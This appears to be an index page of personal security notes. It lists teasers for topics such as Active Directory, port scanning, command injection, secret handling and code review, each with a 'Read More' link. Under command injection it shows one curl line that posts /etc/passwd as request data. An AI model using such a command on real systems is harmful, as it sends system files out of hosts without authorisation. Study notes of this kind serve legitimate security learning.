Comprehensive Guide to Active Directory (AD)
For main commands, go to [https://github.com/qwutony/notes/edit/main/022-Active%20Directory/Commands.md](https://github.com/qwutony/notes/blob/main/022-Active%20Directory/Commands.md)
Read More
Common ports to scan
Modify the script to accept a list of IP addresses to scan as an argument.
Read More
Command Injection
+ `curl -i -X POST -H “Content-Type: text/xml” --data-binary “@/etc/passwd”`
Read More
Coding Standards
Using `.env` file for storing secrets: https://dev.to/biplov/handling-passwords-and-secret-keys-using-environment-variables-2ei0
Read More
Code Snippets
+ https://twitter.com/intigriti/status/1600837243308244992
Read More
Code Review Basics and Commands
+ https://security.humanativaspa.it/automating-binary-vulnerability-discovery-with-ghidra-and-semgrep/
Read More